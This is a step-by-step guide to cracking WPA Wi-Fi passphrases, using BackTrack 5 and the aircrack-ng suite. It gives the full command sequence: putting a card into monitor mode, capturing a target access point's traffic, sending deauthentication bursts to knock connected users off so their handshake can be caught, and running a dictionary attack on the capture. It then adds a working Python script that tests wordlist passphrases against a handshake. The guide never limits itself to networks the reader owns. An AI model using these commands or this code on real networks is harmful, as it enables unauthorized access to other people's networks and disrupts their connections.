Quick and dirty guide to cracking WPA wireless networks. Find more details, instructions and information at:
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Get a live CD or live USB image of BackTrack 5 here. You have a choice of GNOME or KDE, 32- or 64-bit.
Boot from the live CD; it logs you in as root automatically. Type "startx" to load the GUI, then open a terminal from the applications menu.
The simplest method, but not necessarily the fastest, uses the aircrack-ng program suite.
Identify your wireless card. Type "iwconfig" in the terminal and read the output; it lists only the wireless interfaces, which is less noise than "ifconfig". Your wireless card will probably be either wlan0 or ath0. For the rest of this guide, we will assume wlan0.
Put your wireless card into monitor mode, so it captures every frame on the channel rather than only the frames addressed to it, and bring it back up before starting the sniffer.
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
# airodump-ng wlan0
If iwconfig refuses to change the mode, use "airmon-ng start wlan0" instead; it creates a separate monitor interface (usually mon0), and you then use that name in place of wlan0 in every command below.
If all goes well, airodump starts listing the visible wireless networks, showing for each its BSSID (the AP's MAC address), channel (CH), encryption and ESSID (the network name). If you get an error, search for the exact error message together with the name of your card's driver.
Press "ctrl+c" to stop airodump once you see the name of the wireless network you are trying to crack, and note its channel and BSSID. Run it again, locked to that channel, filtered to that AP, and writing the capture to disk:
# airodump-ng -c <wireless channel> --bssid <mac address of wireless AP> -w capture wlan0
The argument to -w is a file prefix, not a file name: airodump writes capture-01.cap (plus a capture-01.csv summary), and the number goes up each time you rerun the command.
At this point you are only capturing frames for the network in question. Wait until a station connects (or reconnects) to the wireless network and you capture the 4-way handshake. When this happens, airodump shows "WPA handshake: <BSSID>" on the top line of its display.
You can force any connected station to disconnect; it will usually reconnect automatically, and you catch the handshake when it does. This uses attack 0 (deauthentication) of aireplay-ng. In another tab, run:
# aireplay-ng -0 60 -a <mac address of wireless AP> wlan0
The number after -0 is how many deauth bursts to send (0 means keep sending until you stop it). Adding -c <mac address of station> targets a single client instead of broadcasting to every station on the AP, which is quieter; the station MACs are listed in the lower half of airodump's display.
If your laptop's signal is strong enough, this disconnects the station and forces it to reconnect, letting you capture the handshake. Go back to the first tab and check airodump's progress; you should see the note that a handshake has been captured. If not, try the aireplay command a few more times. If you still do not see a handshake, get closer to the access point, use a bigger antenna, check that your card actually supports packet injection ("aireplay-ng -9 wlan0" tests this), and double-check that there is an active station connected to the wireless network: with nobody connected there is no handshake to capture.
Okay, so you have captured a 4-way handshake. Now you can hand it to aircrack, which runs a dictionary attack against it: for each word it derives the candidate key from the word and the ESSID and checks whether that key reproduces the MIC in the handshake. The per-word derivation is deliberately slow (4096 rounds of PBKDF2), so depending on the size of the dictionary this can take a few hours. First confirm that the capture really holds a handshake by running aircrack without a wordlist; it lists each network in the file, with "WPA (1 handshake)" next to the ones you can attack. Then start the attack, naming the target AP so aircrack does not stop to ask which network you mean if the file contains more than one:
# aircrack-ng capture-01.cap
# aircrack-ng -w <password list> -b <mac address of wireless AP> capture-01.cap
BackTrack has a decent password list at: /pentest/passwords/wordlists/darkc0de.lst. Note that WPA passphrases are 8 to 63 characters long, so shorter entries in a list can never match and aircrack skips them.
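What aircrack-ng actually does with the handshake, written out as an added example (this is illustrative code, not aircrack-ng's own implementation): derive the PMK from the candidate passphrase and ESSID with PBKDF2, expand it into the PTK with the two MAC addresses and two nonces, and check whether the first 16 bytes (the KCK) reproduce the MIC on EAPOL message 2. The network name, MAC addresses, nonces, passphrase and wordlist below are constructed for the demo, not taken from a real capture; the only real-world value is the IEEE 802.11i test vector ("password" / "IEEE") used to check the PMK derivation.

```python
import hashlib
import hmac

# Offset of the 16-byte MIC inside an EAPOL-Key frame: EAPOL header (4) +
# descriptor type (1) + key info (2) + key length (2) + replay counter (8) +
# nonce (32) + IV (16) + RSC (8) + ID (8) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, essid):
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    The 4096 iterations are why a dictionary run takes hours rather than seconds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame, key_version):
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed.
    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) HMAC-SHA1 cut to 128 bits."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(essid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, key_version, wordlist):
    """Return the passphrase whose KCK reproduces the captured MIC, or None.
    Message 2 (station -> AP) is enough: it carries the SNonce and a MIC; ANonce comes from message 1."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        pmk = pmk_from_passphrase(word, essid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, key_version), captured_mic):
            return word
    return None


# ---- Constructed sample handshake (hypothetical network, not a real capture) ----
SAMPLE_ESSID = "HomeNet"
SAMPLE_AP = bytes.fromhex("020000000001")
SAMPLE_STA = bytes.fromhex("020000000002")
SAMPLE_ANONCE = bytes(range(32))
SAMPLE_SNONCE = bytes(range(32, 64))
SAMPLE_VERSION = 2  # CCMP


def build_msg2(snonce, key_version, mic=b"\x00" * 16):
    """Minimal EAPOL-Key message 2 (no key data) carrying the given MIC."""
    key_info = (0x0108 | key_version).to_bytes(2, "big")  # MIC bit + pairwise + version
    body = (b"\x02" + key_info + b"\x00\x10" + b"\x00" * 8 + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def sample_capture(passphrase="sunshine1"):
    """Fabricate what airodump would have recorded for a network using `passphrase`."""
    pmk = pmk_from_passphrase(passphrase, SAMPLE_ESSID)
    kck = derive_ptk(pmk, SAMPLE_AP, SAMPLE_STA, SAMPLE_ANONCE, SAMPLE_SNONCE)[:16]
    unsigned = build_msg2(SAMPLE_SNONCE, SAMPLE_VERSION)
    return build_msg2(SAMPLE_SNONCE, SAMPLE_VERSION, eapol_mic(kck, unsigned, SAMPLE_VERSION))


def run_demo(wordlist=("123456", "letmein", "sunshine1", "qwerty")):
    """Run the dictionary attack over the constructed capture; returns the hit or None."""
    return crack_handshake(SAMPLE_ESSID, SAMPLE_AP, SAMPLE_STA, SAMPLE_ANONCE,
                           SAMPLE_SNONCE, sample_capture(), SAMPLE_VERSION, wordlist)


if __name__ == "__main__":
    print("802.11i test vector PMK:", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", run_demo())
```

Everything aircrack needs is visible in the clear in the capture (ESSID from the beacon, both MACs and both nonces from messages 1 and 2, the MIC from message 2); only the PMK is secret, and the 4096-round PBKDF2 per candidate is the whole cost of the attack, which is also why the ESSID, acting as the salt, prevents precomputed tables from being reused across differently named networks.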